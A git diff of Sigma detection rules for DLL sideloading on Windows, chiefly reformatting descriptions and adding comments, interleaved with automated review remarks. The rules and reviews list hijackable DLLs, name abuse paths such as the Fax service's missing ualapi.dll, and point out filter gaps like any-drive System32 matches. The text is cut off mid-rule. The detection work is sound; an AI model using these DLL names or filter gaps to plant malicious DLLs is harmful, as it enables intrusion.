@@ -1,13 +1,12 @@ title: Potential System DLL Sideloading From Non System Locations id: 4fc0deee-0057-4998-ab31-d24e46e0aba4 status: experimental -description: Detects DLL sideloading of DLLs usually located in system locations (System32, - SysWOW64, etc.). +description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). references: - - https://hijacklibs.net/ - - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ - - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ - - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there). Wietze Beukema (project and research) + - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ # WindowsCodecs.dll + - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll + - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md # XForceIR (SideLoadHunter Project), Chris Spehn (research WFH Dridex) - https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 @@ -418,6 +417,7 @@ detection: - \winsync.dll - \wscapi.dll - \wsmsvc.dll + # From https://github.com/XForceIR/SideLoadHunter/blob/main/SideLoads/README.md - \FxsCompose.dll - \WfsR.dll - \rpchttp.dll 
@@ -434,10 +434,12 @@ detection: - \FXSRESM.DLL - \cryptnet.dll - \COMRES.DLL + # The DLLs below exists in "C:\Windows\System32\DriverStore\FileRepository\" folder. But there is also a copy located in "C:\ProgramData\Package Cache\XXXXXXX\Graphics\". If you see them being loaded from there. Please comment them out, don't add a filter for ProgramData :) - \igdumdim64.dll - \igd10iumd64.dll - \igd12umd64.dll - \igdusc64.dll + # Other - \WLBSCTRL.dll - \TSMSISrv.dll - \TSVIPSrv.dll @@ -445,6 +447,7 @@ detection: - \WptsExtensions.dll - \wbemcomn.dll filter_main_generic: + # Note: this filter is generic on purpose to avoid insane amount of FP from legitimate third party applications. A better approach would be to baseline everything and add specific filters to avoid blind spots ImageLoaded|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ @@ -479,7 +482,6 @@ detection: ImageLoaded|endswith: \PolicyManager.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate applications loading their own versions of the DLLs mentioned in - this rule + - Legitimate applications loading their own versions of the DLLs mentioned in this rule level: high ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_goopdate.yml b/sigma/sysmon/image_load/image_load_side_load_goopdate.yml index 776ca06fe..177c0b618 100644 --- a/sigma/sysmon/image_load/image_load_side_load_goopdate.yml +++ b/sigma/sysmon/image_load/image_load_side_load_goopdate.yml @@ -24,6 +24,7 @@ detection: ImageLoaded|endswith: \goopdate.dll filter_main_generic: ImageLoaded|startswith: + # Many third party chromium based apps use this DLLs. It's better to create a baseline and add specific filters - C:\Program Files (x86)\ - C:\Program Files\ filter_optional_dropbox_installer_temp: 
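Review bot: In the `@@ -445,6 +447,7 @@` hunk the new comment on `filter_main_generic` explains that the filter is broad on purpose, but it does not mention that `ImageLoaded|contains: ':\Windows\System32\'` / `':\Windows\SysWOW64\'` match on any drive letter, so a `D:\Windows\System32\<dll>` path creatable by a standard user on a non-system volume is filtered out of a `level: high` rule whose premise is precisely "system DLL loaded from a non-system location". Extending the comment with `# Note: the ':\Windows\...' patterns match any drive letter, so a user-created D:\Windows\System32\ is filtered too; use startswith with the system drive if your environment allows` makes the blind spot visible to whoever tunes it. The `@@ -434,10 +434,12 @@` comment about the Intel graphics DLLs and `Package Cache` is good guidance; the trailing `:)` could be dropped for consistency with the rest of the file. In the goopdate hunk the new comment `# Many third party chromium based apps use this DLLs.` should read `use this DLL`.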
@@ -35,8 +36,7 @@ detection: - .tmp\\goopdate.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - False positives are expected from Google Chrome installations running from user - locations (AppData) and other custom locations. Apply additional filters accordingly. + - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly. - Other third party chromium browsers located in AppData level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_gup_libcurl.yml b/sigma/sysmon/image_load/image_load_side_load_gup_libcurl.yml index 7d316bc72..7d7f965ac 100644 --- a/sigma/sysmon/image_load/image_load_side_load_gup_libcurl.yml +++ b/sigma/sysmon/image_load/image_load_side_load_gup_libcurl.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE id: e49b5745-1064-4ac1-9a2e-f687bc2dd37e status: experimental -description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process - from an uncommon location +description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_iviewers.yml b/sigma/sysmon/image_load/image_load_side_load_iviewers.yml index da39ca9ff..730c213a5 100644 --- a/sigma/sysmon/image_load/image_load_side_load_iviewers.yml +++ b/sigma/sysmon/image_load/image_load_side_load_iviewers.yml 
@@ -1,8 +1,7 @@ title: Potential Iviewers.DLL Sideloading id: 4c21b805-4dd7-469f-b47d-7383a8fcb437 status: experimental -description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface - Viewer) +description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) references: - https://www.secureworks.com/research/shadowpad-malware-analysis author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_libvlc.yml b/sigma/sysmon/image_load/image_load_side_load_libvlc.yml index e8a5c9ee8..2cb9ebb80 100644 --- a/sigma/sysmon/image_load/image_load_side_load_libvlc.yml +++ b/sigma/sysmon/image_load/image_load_side_load_libvlc.yml @@ -1,8 +1,7 @@ title: Potential Libvlc.DLL Sideloading id: bf9808c4-d24f-44a2-8398-b65227d406b6 status: experimental -description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately - used by "VLC.exe" +description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" references: - https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html - https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html diff --git a/sigma/sysmon/image_load/image_load_side_load_mfdetours.yml b/sigma/sysmon/image_load/image_load_side_load_mfdetours.yml index e6bffd71f..01d214f53 100644 --- a/sigma/sysmon/image_load/image_load_side_load_mfdetours.yml +++ b/sigma/sysmon/image_load/image_load_side_load_mfdetours.yml 
@@ -1,9 +1,7 @@ title: Potential Mfdetours.DLL Sideloading id: d2605a99-2218-4894-8fd3-2afb7946514d status: experimental -description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" - it can be abused to attach to an arbitrary process and force load any DLL named - "mfdetours.dll" from the current directory of execution. +description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml b/sigma/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml index 5218d8454..fed8be5b7 100644 --- a/sigma/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml +++ b/sigma/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml @@ -1,12 +1,10 @@ title: Unsigned Mfdetours.DLL Sideloading id: 948a0953-f287-4806-bbcb-3b2e396df89f related: - - id: d2605a99-2218-4894-8fd3-2afb7946514d - type: similar + - id: d2605a99-2218-4894-8fd3-2afb7946514d + type: similar status: experimental -description: Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" - can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" - from the current directory of execution. +description: Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_non_existent_dlls.yml b/sigma/sysmon/image_load/image_load_side_load_non_existent_dlls.yml index ffac6a6ab..6c96d22e8 100644 
--- a/sigma/sysmon/image_load/image_load_side_load_non_existent_dlls.yml +++ b/sigma/sysmon/image_load/image_load_side_load_non_existent_dlls.yml @@ -1,17 +1,14 @@ title: Potential DLL Sideloading Of Non-Existent DLLs From System Folders id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 related: - - id: df6ecb8b-7822-4f4b-b412-08f524b4576c - type: similar - - id: 602a1f13-c640-4d73-b053-be9a2fa58b77 - type: obsoletes + - id: df6ecb8b-7822-4f4b-b412-08f524b4576c # FileEvent rule + type: similar + - id: 602a1f13-c640-4d73-b053-be9a2fa58b77 + type: obsoletes status: test -description: 'Detects DLL sideloading of system DLLs that are not present on the system - by default (at least not in system directories). - +description: | + Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation. - - ' references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 @@ -38,6 +35,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ImageLoaded|endswith: + # Add other DLLs - :\Windows\System32\TSMSISrv.dll - :\Windows\System32\TSVIPSrv.dll - :\Windows\System32\wbem\wbemcomn.dll @@ -47,6 +45,7 @@ detection: filter_main_ms_signed: Signed: 'true' SignatureStatus: Valid + # There could be other signatures (please add when found) Signature: Microsoft Windows condition: image_load and (selection and not 1 of filter_main_*) falsepositives: diff --git a/sigma/sysmon/image_load/image_load_side_load_office_dlls.yml b/sigma/sysmon/image_load/image_load_side_load_office_dlls.yml index a73510545..b6ce7b7a8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_office_dlls.yml +++ b/sigma/sysmon/image_load/image_load_side_load_office_dlls.yml 
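Review bot: The new comment `# There could be other signatures (please add when found)` inside `filter_main_ms_signed` invites adding further signer names to the exclusion, but the `selection` matches fixed `:\Windows\System32\...` paths for DLLs the description says are not present by default, so a validly signed non-Microsoft DLL at one of those paths is arguably still the anomaly this rule exists to catch. Rewording it to `# Note: only extend with additional Microsoft signer strings if observed; a third-party signed DLL at these paths is still a hijack candidate` prevents a well-meaning tuner from neutering the rule. The `# Add other DLLs` comment above the list gives no criterion; something like `# Add other DLLs that are loaded from system folders but are not shipped there by default` ties it back to the description. Both the `selection` list and the condition are fully visible here, so these are documentation-only changes.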
@@ -1,10 +1,9 @@ title: Microsoft Office DLL Sideload id: 829a3bdf-34da-4051-9cf4-8ed221a8ae4f status: experimental -description: Detects DLL sideloading of DLLs that are part of Microsoft Office from - non standard location +description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 modified: 2023/03/15 diff --git a/sigma/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml b/sigma/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml index 58369c1e6..2460bc732 100644 --- a/sigma/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml +++ b/sigma/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml @@ -1,9 +1,7 @@ title: Potential RjvPlatform.DLL Sideloading From Default Location id: 259dda31-b7a3-444f-b7d8-17f96e8a7d0d status: experimental -description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" - binary which can be abused as a method of DLL side loading since the "$SysReset" - directory isn't created by default. +description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. references: - https://twitter.com/0gtweet/status/1666716511988330499 author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml b/sigma/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml index 3c4ee735e..a32161b66 100644 --- a/sigma/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml 
+++ b/sigma/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml @@ -1,8 +1,7 @@ title: Potential RjvPlatform.DLL Sideloading From Non-Default Location id: 0e0bc253-07ed-43f1-816d-e1b220fe8971 status: experimental -description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" - located in a non-default location. +description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. references: - https://twitter.com/0gtweet/status/1666716511988330499 author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_robform.yml b/sigma/sysmon/image_load/image_load_side_load_robform.yml index 6202f5942..bd904db56 100644 --- a/sigma/sysmon/image_load/image_load_side_load_robform.yml +++ b/sigma/sysmon/image_load/image_load_side_load_robform.yml @@ -1,8 +1,7 @@ title: Potential RoboForm.DLL Sideloading id: f64c9b2d-b0ad-481d-9d03-7fc75020892a status: experimental -description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm - Password Manager +description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager references: - https://twitter.com/StopMalvertisin/status/1648604148848549888 - https://twitter.com/t3ft3lb/status/1656194831830401024 @@ -35,7 +34,6 @@ detection: - \robotaskbaricon-x64.exe condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - - If installed on a per-user level, the path would be located in "AppData\Local". - Add additional filters to reflect this mode of installation + - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/image_load/image_load_side_load_shell_chrome_api.yml b/sigma/sysmon/image_load/image_load_side_load_shell_chrome_api.yml index 2be88ba36..82e78ade8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_shell_chrome_api.yml +++ b/sigma/sysmon/image_load/image_load_side_load_shell_chrome_api.yml @@ -1,17 +1,12 @@ title: DLL Sideloading Of ShellChromeAPI.DLL id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 related: - - id: e173ad47-4388-4012-ae62-bd13f71c18a8 - type: similar + - id: e173ad47-4388-4012-ae62-bd13f71c18a8 + type: similar status: test -description: 'Detects processes loading the non-existent DLL "ShellChromeAPI". One - known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" - flag tries to load this DLL. - - Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe - using this parameter - - ' +description: | + Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. + Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter references: - https://mobile.twitter.com/0gtweet/status/1564131230941122561 - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html @@ -32,6 +27,7 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: + # The DLL shouldn't exist on Windows anymore. If for some reason you still have it. You could filter out legitimate calls ImageLoaded|endswith: \ShellChromeAPI.dll condition: image_load and selection falsepositives: diff --git a/sigma/sysmon/image_load/image_load_side_load_shelldispatch.yml b/sigma/sysmon/image_load/image_load_side_load_shelldispatch.yml index 595711497..16fe14edf 100644 --- a/sigma/sysmon/image_load/image_load_side_load_shelldispatch.yml 
+++ b/sigma/sysmon/image_load/image_load_side_load_shelldispatch.yml @@ -22,10 +22,10 @@ detection: selection: ImageLoaded|endswith: \ShellDispatch.dll filter_main_legit_path: - - ImageLoaded|contains|all: - - :\Users\ - - \AppData\Local\Temp\ - - ImageLoaded|contains: :\Windows\Temp\ + - ImageLoaded|contains|all: + - :\Users\ + - \AppData\Local\Temp\ + - ImageLoaded|contains: :\Windows\Temp\ condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - Some installers may trigger some false positives diff --git a/sigma/sysmon/image_load/image_load_side_load_smadhook.yml b/sigma/sysmon/image_load/image_load_side_load_smadhook.yml index b581b49f1..9dd71dcba 100644 --- a/sigma/sysmon/image_load/image_load_side_load_smadhook.yml +++ b/sigma/sysmon/image_load/image_load_side_load_smadhook.yml @@ -1,8 +1,7 @@ title: Potential SmadHook.DLL Sideloading id: 24b6cf51-6122-469e-861a-22974e9c1e5b status: experimental -description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV - antivirus +description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus references: - https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/ - https://www.qurium.org/alerts/targeted-malware-against-crph/ diff --git a/sigma/sysmon/image_load/image_load_side_load_third_party.yml b/sigma/sysmon/image_load/image_load_side_load_third_party.yml index 8cf526711..4ff9cb6f8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_third_party.yml +++ b/sigma/sysmon/image_load/image_load_side_load_third_party.yml 
@@ -1,10 +1,9 @@ title: Third Party Software DLL Sideloading id: f9df325d-d7bc-4a32-8a1a-2cc61dcefc63 status: test -description: Detects DLL sideloading of DLLs that are part of third party software - (zoom, discord....etc) +description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 tags: @@ -18,24 +17,31 @@ logsource: category: image_load product: windows detection: + # Lenovo image_load: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection_lenovo: ImageLoaded|endswith: \commfunc.dll filter_lenovo: - - ImageLoaded|contains: \AppData\local\Google\Chrome\Application\ - - ImageLoaded|startswith: - - C:\Program Files\Lenovo\Communications Utility\ - - C:\Program Files (x86)\Lenovo\Communications Utility\ + - ImageLoaded|contains: \AppData\local\Google\Chrome\Application\ + - ImageLoaded|startswith: + - C:\Program Files\Lenovo\Communications Utility\ + - C:\Program Files (x86)\Lenovo\Communications Utility\ + # Toshiba selection_toshiba: ImageLoaded|endswith: \tosbtkbd.dll filter_toshiba: ImageLoaded|startswith: - C:\Program Files\Toshiba\Bluetooth Toshiba Stack\ - C:\Program Files (x86)\Toshiba\Bluetooth Toshiba Stack\ - condition: image_load and ((selection_lenovo and not filter_lenovo) or (selection_toshiba - and not filter_toshiba)) + # Zoom (FP with System32) + # selection_zoom: + # ImageLoaded|endswith: '\version.dll' + # filter_zoom: + # ImageLoaded|startswith: 'C:\Users\' + # ImageLoaded|contains: '\AppData\Roaming\Zoom\bin\' + condition: image_load and ((selection_lenovo and not filter_lenovo) or (selection_toshiba and not filter_toshiba)) falsepositives: - Unknown level: medium 
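Review bot: The new `# Lenovo` comment is placed above `image_load:`, the shared Sysmon `EventID: 7` / `Channel` selector, while `# Toshiba` sits directly on `selection_toshiba:`; moving it to `  # Lenovo` immediately before `selection_lenovo:` keeps the vendor labels attached to the selections they describe. The commented-out Zoom block is annotated `# Zoom (FP with System32)`, which suggests the sketched `filter_zoom` (Zoom's `AppData\Roaming\Zoom\bin\` path only) was not enough because `version.dll` is also a legitimate system DLL; if it is ever re-enabled, the comment should say that a `:\Windows\System32\` / `SysWOW64` exclusion (or a separate rule) is needed, e.g. `# Zoom: disabled, version.dll is also a system DLL; needs a System32/SysWOW64 filter before re-enabling`. The `filter_lenovo` entry `ImageLoaded|contains: \AppData\local\Google\Chrome\Application\` excludes any path containing that fragment without a signature check; that is pre-existing, but worth a line in `falsepositives` stating the filter is path-based only.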
diff --git a/sigma/sysmon/image_load/image_load_side_load_ualapi.yml b/sigma/sysmon/image_load/image_load_side_load_ualapi.yml index 0220cba36..084aa29f1 100644 --- a/sigma/sysmon/image_load/image_load_side_load_ualapi.yml +++ b/sigma/sysmon/image_load/image_load_side_load_ualapi.yml @@ -1,8 +1,7 @@ title: Fax Service DLL Search Order Hijack id: 828af599-4c53-4ed2-ba4a-a9f835c434ea status: test -description: The Fax service attempts to load ualapi.dll, which is non-existent. An - attacker can then (side)load their own malicious DLL using this service. +description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. references: - https://windows-internals.com/faxing-your-way-to-system/ author: NVISO diff --git a/sigma/sysmon/image_load/image_load_side_load_vmguestlib.yml b/sigma/sysmon/image_load/image_load_side_load_vmguestlib.yml index af3b994c8..a1a4d5b7f 100644 --- a/sigma/sysmon/image_load/image_load_side_load_vmguestlib.yml +++ b/sigma/sysmon/image_load/image_load_side_load_vmguestlib.yml @@ -29,7 +29,6 @@ detection: Signed: 'true' condition: image_load and (selection and not filter) falsepositives: - - FP could occur if the legitimate version of vmGuestLib already exists on the - system + - FP could occur if the legitimate version of vmGuestLib already exists on the system level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml b/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml index 03dffc1f7..c533fb888 100644 --- a/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml +++ b/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml 
@@ -1,11 +1,10 @@ title: VMMap Signed Dbghelp.DLL Potential Sideloading id: 98ffaed4-aec2-4e04-9b07-31492fe68b3d related: - - id: 273a8dd8-3742-4302-bcc7-7df5a80fe425 - type: similar + - id: 273a8dd8-3742-4302-bcc7-7df5a80fe425 + type: similar status: experimental -description: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals - VMMap. +description: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap. references: - https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml b/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml index 945ebb5f1..eb6947876 100644 --- a/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml +++ b/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml @@ -1,11 +1,10 @@ title: VMMap Unsigned Dbghelp.DLL Potential Sideloading id: 273a8dd8-3742-4302-bcc7-7df5a80fe425 related: - - id: 98ffaed4-aec2-4e04-9b07-31492fe68b3d - type: similar + - id: 98ffaed4-aec2-4e04-9b07-31492fe68b3d + type: similar status: experimental -description: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals - VMMap. +description: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap. references: - https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_vmware_xfer.yml b/sigma/sysmon/image_load/image_load_side_load_vmware_xfer.yml index 0520aeedb..6fed1e780 100644 --- a/sigma/sysmon/image_load/image_load_side_load_vmware_xfer.yml +++ b/sigma/sysmon/image_load/image_load_side_load_vmware_xfer.yml 
@@ -1,8 +1,7 @@ title: Potential DLL Sideloading Via VMware Xfer id: 9313dc13-d04c-46d8-af4a-a930cc55d93b status: test -description: Detects loading of a DLL by the VMware Xfer utility from the non-default - directory which may be an attempt to sideload arbitrary DLL +description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +21,7 @@ detection: selection: Image|endswith: \VMwareXferlogs.exe ImageLoaded|endswith: \glib-2.0.dll - filter: + filter: # VMware might be installed in another path so update the rule accordingly ImageLoaded|startswith: C:\Program Files\VMware\ condition: image_load and (selection and not filter) falsepositives: diff --git a/sigma/sysmon/image_load/image_load_side_load_waveedit.yml b/sigma/sysmon/image_load/image_load_side_load_waveedit.yml index 75a7d7d21..5f6748702 100644 --- a/sigma/sysmon/image_load/image_load_side_load_waveedit.yml +++ b/sigma/sysmon/image_load/image_load_side_load_waveedit.yml @@ -1,8 +1,7 @@ title: Potential Waveedit.DLL Sideloading id: 71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb status: experimental -description: Detects potential DLL sideloading of "waveedit.dll", which is part of - the Nero WaveEditor audio editing software. +description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. references: - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_wazuh.yml b/sigma/sysmon/image_load/image_load_side_load_wazuh.yml index b7c23d8d7..2168a50db 100644 --- a/sigma/sysmon/image_load/image_load_side_load_wazuh.yml 
+++ b/sigma/sysmon/image_load/image_load_side_load_wazuh.yml @@ -1,8 +1,7 @@ title: Potential Wazuh Security Platform DLL Sideloading id: db77ce78-7e28-4188-9337-cf30e2b3ba9f status: experimental -description: Detects potential DLL side loading of DLLs that are part of the Wazuh - security platform +description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform references: - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html author: X__Junior (Nextron Systems) @@ -31,13 +30,14 @@ detection: - C:\Program Files\ - C:\Program Files (x86)\ filter_optional_mingw64: + # Note: Many third party apps installed in "AppData" or "ProgramData" and leverage "mingw64" make use of "libwinpthread-1.dll" + # In production its best to make a list of these apps and replace this filter with a specific one. ImageLoaded|contains: - \AppData\Local\ - \ProgramData\ ImageLoaded|endswith: \mingw64\bin\libwinpthread-1.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, - Anaconda, GithubDesktop, etc.) + - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_windows_defender.yml b/sigma/sysmon/image_load/image_load_side_load_windows_defender.yml index d6ba748c8..7ca31893a 100644 --- a/sigma/sysmon/image_load/image_load_side_load_windows_defender.yml +++ b/sigma/sysmon/image_load/image_load_side_load_windows_defender.yml 
@@ -1,11 +1,10 @@ title: Potential Mpclient.DLL Sideloading id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc related: - - id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 - type: similar + - id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 + type: similar status: experimental -description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes - ("MpCmdRun" and "NisSrv") from their non-default directory. +description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj diff --git a/sigma/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml b/sigma/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml index d635f8cfc..3e6eda90a 100644 --- a/sigma/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml +++ b/sigma/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml @@ -20,8 +20,8 @@ detection: selection_path: Image|contains: \AppData\Local\Apps\2.0\ selection_sig_status: - - Signed: 'false' - - SignatureStatus: Expired + - Signed: 'false' + - SignatureStatus: Expired condition: image_load and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/image_load/image_load_susp_dll_load_system_process.yml b/sigma/sysmon/image_load/image_load_susp_dll_load_system_process.yml index dfcf5ed4e..e5546853f 100644 --- a/sigma/sysmon/image_load/image_load_susp_dll_load_system_process.yml +++ b/sigma/sysmon/image_load/image_load_susp_dll_load_system_process.yml 
@@ -1,9 +1,7 @@ title: DLL Load By System Process From Suspicious Locations id: 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c status: experimental -description: Detects when a system process (i.e. located in system32, syswow64, etc.) - loads a DLL from a suspicious location or a location with permissive permissions - such as "C:\Users\Public" +description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" references: - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea) author: Nasreddine Bencherchali (Nextron Systems) @@ -23,6 +21,7 @@ detection: selection: Image|startswith: C:\Windows\ ImageLoaded|startswith: + # TODO: Add more suspicious paths as you see fit in your env - C:\Users\Public\ - C:\PerfLogs\ condition: image_load and selection diff --git a/sigma/sysmon/image_load/image_load_susp_python_image_load.yml b/sigma/sysmon/image_load/image_load_susp_python_image_load.yml index 30a8f625c..04941df06 100644 --- a/sigma/sysmon/image_load/image_load_susp_python_image_load.yml +++ b/sigma/sysmon/image_load/image_load_susp_python_image_load.yml @@ -1,8 +1,7 @@ title: Python Image Load By Non-Python Process id: cbb56d62-4060-40f7-9466-d8aaf3123f83 status: experimental -description: Detects the image load of "Python Core" by a non-Python 